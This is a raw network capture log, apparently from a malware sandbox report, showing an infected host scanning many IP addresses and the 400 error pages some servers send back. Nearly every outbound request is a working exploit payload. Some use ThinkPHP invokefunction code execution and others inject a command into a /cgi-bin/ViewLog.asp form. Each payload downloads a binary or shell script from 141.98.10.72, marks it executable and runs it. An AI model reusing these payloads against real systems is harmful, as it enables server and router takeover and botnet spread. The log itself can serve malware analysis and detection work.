                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      544192.168.2.1542402112.168.163.8080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:10.668281078 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      545192.168.2.1554908112.192.21.18580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:10.994168043 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:12.664846897 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.648808002 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:18.776737928 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:26.712562084 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:42.584031105 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:14.071223974 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      546192.168.2.1533838112.90.88.9080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:11.038671970 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      547192.168.2.153865695.179.193.10080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:11.612227917 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:11.804488897 CET505INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                      Server: Apache/2.4.29 (Ubuntu)
                                                      Content-Length: 311
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 6f 72 6b 2e 6c 70 6d 69 74 63 68 65 6c 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at work.lpmitchell.com Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      548192.168.2.155400495.164.1.12680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:11.615892887 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:11.817478895 CET578INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                      Server: Apache/2.4.41 (Ubuntu)
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      Content-Length: 328
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 76 6d 32 30 37 34 38 33 34 2e 73 74 61 72 6b 2d 69 6e 64 75 73 74 72 69 65 73 2e 73 6f 6c 75 74 69 6f 6e 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at vm2074834.stark-industries.solutions Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      549192.168.2.153427695.142.121.3480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:11.623507023 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:11.826921940 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.22.1
                                                      Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.1</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      550192.168.2.153512095.110.177.15080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:11.637296915 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:11.854536057 CET307INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:30:11 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      551192.168.2.153548095.68.75.4980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:11.639631033 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:11.865365982 CET64INHTTP/1.1 400 Bad Request
                                                      Connection: Keep-Alive
                                                      Feb 14, 2024 09:30:11.865377903 CET17INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      552192.168.2.155920695.68.11.20080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:11.643542051 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:11.869751930 CET64INHTTP/1.1 400 Bad Request
                                                      Connection: Keep-Alive
                                                      Feb 14, 2024 09:30:11.870762110 CET17INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      553192.168.2.155702231.136.112.1228080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.285900116 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:12.920963049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.168945074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:16.728835106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:21.848630905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:31.832422972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:53.591947079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:34.550789118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      554192.168.2.154686231.136.12.2068080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.291043997 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.448818922 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:21.592605114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.624401093 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687917948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:46.838293076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      555192.168.2.153764831.132.79.1158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.292088032 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      556192.168.2.153855894.198.133.2048080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:12.312185049 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
